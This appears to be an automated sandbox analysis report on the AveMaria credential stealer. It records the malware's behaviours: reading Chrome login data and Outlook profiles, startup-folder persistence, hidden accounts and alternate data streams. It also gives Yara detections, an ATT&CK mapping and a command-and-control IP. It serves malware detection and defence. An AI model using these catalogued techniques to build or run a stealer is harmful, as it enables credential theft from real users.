          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00408024 cpuid 0_2_00408024
          Source: C:\ProgramData\images.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040826B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040826B
          Source: C:\ProgramData\images.exeCode function: 4_3_02F494E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,4_3_02F494E0

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Increases the number of concurrent connection per server for Internet Explorer
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected AveMaria stealer
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\ProgramData\images.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Contains functionality to steal e-mail passwords
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: POP3 Password0_2_02D1A29A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: SMTP Password0_2_02D1A29A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: IMAP Password0_2_02D1A29A
          Contains functionality to steal Chrome passwords or cookies
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: \Google\Chrome\User Data\Default\Login Data0_2_02D1C1B2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: \Chromium\User Data\Default\Login Data0_2_02D1C1B2
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe PID: 6324, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: images.exe PID: 6516, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected AveMaria stealer
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\ProgramData\images.exeCode function: 4_3_02F652D0 sqlite3_transfer_bindings,4_3_02F652D0

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts21
          Windows Management Instrumentation          		1
          LSASS Driver          		1
          LSASS Driver          		11
          Disable or Modify Tools          		3
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium21
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          Endpoint Denial of Service
          Default Accounts11
          Scripting          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		121
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth2
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts12
          Native API          		1
          Create Account          		1
          Access Token Manipulation          		11
          Scripting          		1
          Credentials In Files          		1
          System Service Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration1
          Non-Standard Port          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts2
          Service Execution          		21
          Windows Service          		21
          Windows Service          		21
          Obfuscated Files or Information          		NTDS4
          File and Directory Discovery          		Distributed Component Object Model121
          Input Capture          		Scheduled Transfer1
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCron2
          Registry Run Keys / Startup Folder          		422
          Process Injection          		11
          Software Packing          		LSA Secrets39
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.common2
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		Cached Domain Credentials141
          Security Software Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Masquerading          		DCSync41
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job41
          Virtualization/Sandbox Evasion          		Proc Filesystem3
          Process Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Access Token Manipulation          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)422
          Process Injection          		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron2
          Hidden Users          		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
          NTFS File Attributes          		KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 631792 Sample: SecuriteInfo.com.Gen.Varian... Startdate: 22/05/2022 Architecture: WINDOWS Score: 100 51 Snort IDS alert for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 11 other signatures 2->57 8 SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe 4 8 2->8         started        12 cmd.exe 1 2->12         started        14 tsusbhub.sys 3 2->14         started        16 4 other processes 2->16 process3 file4 41 C:\ProgramData\images.exe, PE32 8->41 dropped 43 C:\ProgramData:ApplicationData, PE32 8->43 dropped 45 C:\Users\user\AppData\...\programs.bat:start, ASCII 8->45 dropped 47 2 other malicious files 8->47 dropped 69 Creates files in alternative data streams (ADS) 8->69 71 Drops script or batch files to the startup folder 8->71 73 Contains functionality to inject threads in other processes 8->73 75 5 other signatures 8->75 18 images.exe 5 9 8->18         started        23 powershell.exe 22 8->23         started        25 WMIC.exe 1 12->25         started        27 conhost.exe 12->27         started        signatures5 process6 dnsIp7 49 23.227.202.157, 49740, 8080 HVC-ASUS United States 18->49 39 C:\Program Files\Microsoft DN1\sqlmap.dll, PE32+ 18->39 dropped 59 Multi AV Scanner detection for dropped file 18->59 61 Hides user accounts 18->61 63 Tries to steal Mail credentials (via file / registry access) 18->63 67 7 other signatures 18->67 29 cmd.exe 1 18->29         started        31 powershell.exe 18->31         started        33 conhost.exe 23->33         started        65 Creates processes via WMI 25->65 file8 signatures9 process10 process11 35 conhost.exe 29->35         started        37 conhost.exe 31->37         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe24%ReversingLabsWin32.Trojan.Streamer
          SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files\Microsoft DN1\sqlmap.dll100%AviraPUA/Remoteadmin.AR
          C:\ProgramData:ApplicationData100%Joe Sandbox ML
          C:\ProgramData\images.exe100%Joe Sandbox ML
          C:\Program Files\Microsoft DN1\sqlmap.dll49%VirustotalBrowse
          C:\Program Files\Microsoft DN1\sqlmap.dll20%MetadefenderBrowse
          C:\Program Files\Microsoft DN1\sqlmap.dll50%ReversingLabsWin64.PUA.Presenoker
          C:\ProgramData:ApplicationData24%ReversingLabsWin32.Trojan.Streamer
          C:\ProgramData\images.exe24%ReversingLabsWin32.Trojan.Streamer

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack100%AviraTR/Redcap.ghjptDownload File
          0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.2.unpack100%AviraTR/Patched.Ren.Gen3Download File
          4.3.images.exe.732cb8.3.unpack100%AviraTR/Patched.Ren.Gen3Download File
          0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack100%AviraTR/Patched.Ren.Gen3Download File
          4.0.images.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.0.images.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.6.unpack100%AviraTR/Patched.Ren.Gen3Download File
          0.0.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.0.images.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.3.images.exe.732cb8.7.unpack100%AviraTR/Patched.Ren.Gen3Download File
          4.2.images.exe.22e053f.3.unpack100%AviraTR/Patched.Ren.Gen3Download File
          4.2.images.exe.2ce0000.4.unpack100%AviraTR/Redcap.ghjptDownload File
          4.0.images.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.2.images.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://stascorp.comDVarFileInfo$0%Avira URL Cloudsafe
          http://www.microsoft.0%URL Reputationsafe
          http://crl.micro0%URL Reputationsafe
          http://crl.microsof0%URL Reputationsafe
          23.227.202.1572%VirustotalBrowse
          23.227.202.1570%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          23.227.202.157true
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://support.google.com/chrome/?p=plugin_flashimages.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://stascorp.comDVarFileInfo$sqlmap.dll.4.drfalse
            • Avira URL Cloud: safe
            		low
            http://www.microsoft.powershell.exe, 00000001.00000003.342861149.0000000008D06000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.micropowershell.exe, 00000006.00000003.407047557.00000000076DF000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://github.com/syohex/java-simple-mine-sweeperC:SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.409298369.00000000044C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://crl.microsofpowershell.exe, 00000001.00000003.377239509.00000000075FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.384190535.00000000075FB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.google.com/chrome/answer/6258784images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/syohex/java-simple-mine-sweeperSecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exefalse
                      		high
                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        23.227.202.157
                        		unknownUnited States
                        		29802HVC-ASUStrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:631792
                        Start date and time: 22/05/202212:32:062022-05-22 12:32:06 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 9s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507 (renamed file extension from 7507 to exe)
                        Cookbook file name:default.jbs
